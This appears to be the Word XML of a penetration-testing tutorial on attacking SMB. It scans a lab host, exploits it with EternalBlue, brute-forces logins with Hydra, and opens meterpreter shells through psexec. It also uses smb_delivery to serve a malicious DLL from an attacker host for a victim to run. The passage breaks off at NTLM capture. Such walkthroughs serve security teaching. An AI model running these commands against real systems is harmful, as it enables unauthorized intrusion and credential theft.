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8FC50" w14:textId="1227E45E" w:rsidR="000C6DE4" w:rsidRPr="00873D4D" w:rsidRDefault="00CB454B" w:rsidP="00CB454B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tools and Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01453998" w14:textId="68FFAB01" w:rsidR="006730DC" w:rsidRPr="00873D4D" w:rsidRDefault="006730DC" w:rsidP="006730DC">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="444444"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C8CF15F"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SMB Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661493D7"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To identify the following information of Windows or Samba system, every pentester go for SMB enumeration during network penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E788023"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Banner Grabbing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD8A12C"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RID cycling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ABE263"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User listing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7118BBCA"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Listing of group membership information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE92DB1"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Share enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788ABC22"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Detecting if a host is in a workgroup or a domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D606693"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Identifying the remote operating system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764C09EA" w14:textId="77777777" w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w:rsidRDefault="00FD1F03" w:rsidP="00FD1F03">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Password policy retrieval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E25413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 you can observe, we are using nmap the most famous network scanning tool for SMB enumeration.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="0" w:name="_GoBack"/>
    <w:p w14:paraId="56444B93" w14:textId="2D880839"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C78FF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1" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId6" w:name="DefaultOcxName" w:shapeid="_x0000_i1451"/>
        </w:object>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9898" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="253"/>
        <w:gridCol w:w="9645"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w14:paraId="37A02BAB" w14:textId="77777777" w:rsidTr="00967159">
        <w:trPr>
          <w:trHeight w:val="186"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="151429C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9600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4192CBC5"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nmap -p 445 -A 192.168.1.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16B81691"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a result, we enumerated the following information about the target machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F466B2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Operating System: Windows 7 ultimate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8A8786"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Computer Name &amp; NetBIOS Name: Raj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7DE1EA"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 security mode: SMB 2.02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1450BDB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There are so many automated scripts and tools available for SMB enumeration and if you want to know more about SMB Enumeration then read this article “</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00873D4D">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>A Little Guide to SMB Enumeration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788B5BBD" w14:textId="2B40D24C"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78FC531D" wp14:editId="031DDA00">
            <wp:extent cx="5731510" cy="47974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97425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B5354"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Scanning Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C8862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During the enumeration phase, generally, we go for banner grabbing to identify a version of running service and the host operating system. Once you enumerate this information then you should go for vulnerability scanning phase to identify whether the install service is a vulnerable version or patched version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CE2D7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Nmap serves various scripts to identify a state of vulnerability for specific services, similarly, it has the inbuilt script for SMB to identify its vulnerable state for given target IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B36F79" w14:textId="05454A9A"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030D88BC">
          <v:shape id="_x0000_i1252" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId9" w:name="DefaultOcxName1" w:shapeid="_x0000_i12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647735A8" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36C839D1"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3A5EDDF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nmap --script smb-vuln* -p 445 192.168.1.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C526CCF"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result, it has shown the target machine is highly vulnerable to Ms17-010 (eternal blue) due to SMBv1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112527E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To know more about Ms17-010 read the complete article “</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00873D4D">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>3 ways to scan Eternal Blue Vulnerability in Remote PC</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59798A0F" w14:textId="03E6BFCB"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394337E3" wp14:editId="19E1BB9A">
            <wp:extent cx="5731510" cy="30841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26B24EEC"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Multiple Ways to Exploit SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218A75AC"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000000"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Eternal Blue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D11B5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we know it is vulnerable to MS17-010 and we can use Metasploit to exploit this machine. Therefore we run the following module which will directly exploit the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C12492C" w14:textId="7335FE9A"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2C3E405">
          <v:shape id="_x0000_i1251" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId12" w:name="DefaultOcxName2" w:shapeid="_x0000_i12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710"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w14:paraId="248D1A43" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="348DE6CA"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42DBAA00"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00159AF2"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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7665" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57E5DA54"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exploit/windows/smb/ms17_010_eternalblue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27F5ACFF"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exploit(ms17_010_eternalblue) &gt; set rhost 192.168.1.101</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16FA8A0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exploit(ms17_010_eternalblue) &gt; exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54354445"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Boom!! We have successfully access remote machine shell as shown in the bellow image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A88F34B" w14:textId="70ABAF3F"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100F7B85" wp14:editId="547A3E0F">
            <wp:extent cx="5731510" cy="34245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p>
    <w:p w14:paraId="12EA5120"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SMB login via Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4236FA0A"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If you get fail to enumerate the vulnerable state of SMB or found a patched version of SMB in the target machine, then we have “Brute force” as another option to gain unauthorized access of remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52231B1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 we only need two dictionaries that contain a list of username and password in each and a brute force tool to make brute force attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D20EF4" w14:textId="6CDB539D"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3D025FC7">
          <v:shape id="_x0000_i1250" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId14" w:name="DefaultOcxName3" w:shapeid="_x0000_i12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2D903DAD" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40946DD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1946008F"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hydra -L user.txt -P pass.txt 192.168.1.101 smb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="119AD38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i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>-L</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> –&gt; denotes the path of username list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB1353C"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i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>-P –&gt;denote the path of password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5854272C"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Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. After a few minutes, Hydra cracks the credential, as you can observe that we had successfully grabbed the SMB </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> as</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> raj </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> password </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> 123</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6F9DE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To know more about it, read the complete article from here “</w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00873D4D">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>5 Ways to Hack SMB Login Password</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68085A83" w14:textId="55DC80B9"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1F21338E" wp14:editId="4FF71B3B">
            <wp:extent cx="5731510" cy="13817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81760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23854003"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If you have SMB login credential, then you can use the following module to determine what local users exist via the SAM RPC service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F5868F" w14:textId="27EA26B6"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57C39564">
          <v:shape id="_x0000_i1249" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId17" w:name="DefaultOcxName4" w:shapeid="_x0000_i12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215"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w14:paraId="54EFFEC3" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B380320"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5EDCC108"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55E64B0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7ED89CA2"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56FDFE4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7170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69115E6F"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auxiliary/scanner/smb/smb_enumusers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A60A456"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auxiliary(smb_enumusers) &gt; set rhosts 192.168.1.101</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="488D532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auxiliary(smb_enumusers) &gt; set smbuser raj</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70BCE0AD"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auxiliary(smb_enumusers) &gt; set smbpass 123</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19044C4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auxiliary(smb_enumusers) &gt; exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="160D620C" w14:textId="72AE7839"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0547101F" wp14:editId="7A74ECD4">
            <wp:extent cx="5731510" cy="19291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29130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A772CB8"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PSexec – To Connect SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FB57D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Once you have SMB login credential of target machine then with the help of the following module of Metasploit you can obtain meterpreter session to access the remote shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D651059" w14:textId="6ABC38AA"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242333B">
          <v:shape id="_x0000_i1248" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId19" w:name="DefaultOcxName5" w:shapeid="_x0000_i12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455"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w14:paraId="3565FD8C" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7930DFE0"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63098165"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7EB5E49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231074F1"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4962F89F"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7410" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74E8D901"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exploit/windows/smb/psexec</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23D9F520"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 windows/smb/psexec) &gt; set rhost 192.168.1.101</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B9D868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 &gt; set smbuser raj</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="653F6BF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 &gt; set smbpass 123</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D1EE5E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 &gt; exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24BCB3A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Once the commands run you will gain a </w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>meterpreter session</w:t>
      </w:r>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> of your victim’s PC and so you can access it as you want.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76451F07"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There so many script and tools are available to connect remote machine using SMB protocol, we have already written an article for connecting SMB in multiple ways. Read complete article from here “</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00873D4D">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="000000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t>Multiple ways to Connect Remote PC using SMB Port</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00873D4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C43811" w14:textId="1B4DF251"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10B41A3B" wp14:editId="5D3A2944">
            <wp:extent cx="5731510" cy="35458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6A7CD01"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Rundll32 One-liner to Exploit SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E70574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serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. Currently supports DLLs and Powershell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D06C25" w14:textId="5E0ECF33"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85EFAF6">
          <v:shape id="_x0000_i1247" type="#_x0000_t75" style="width:136.5pt;height:69.75pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId22" w:name="DefaultOcxName6" w:shapeid="_x0000_i12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475"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD1F03" w:rsidRPr="00873D4D" w14:paraId="16D0FBDE" w14:textId="77777777" w:rsidTr="00FD1F03">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64D1BA4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5CE52DA2"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5F147DE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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="302E45B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exploit/windows/smb/smb_delivery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A35EFB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exploit(windows/smb/smb_delivery) &gt; set srvhost 192.168.1.109</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="023A6F6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exploit(windows/smb/smb_delivery) &gt; exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A5B3CA1"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will generate a link for malicious DLL file, now send this link to your target and wait for his action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4931DA2F" w14:textId="03F8789D"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1ECE8BAE" wp14:editId="16D1A6CB">
            <wp:extent cx="5731510" cy="14598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9865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="188C13E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As soon as the victim will run above malicious code inside the run prompt or command prompt, we will get a meterpreter session at Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E4E5DA" w14:textId="62F00EEA"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74D163A8" wp14:editId="147B8D7F">
            <wp:extent cx="5731510" cy="20078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07870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7852C0F9"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SMB Exploit via NTLM Capture    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C1F61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Another method to exploit SMB is NTLM hash capture by capturing response password hashes of SMB target machine.</w:t>
      </w:r>
    </w:p>
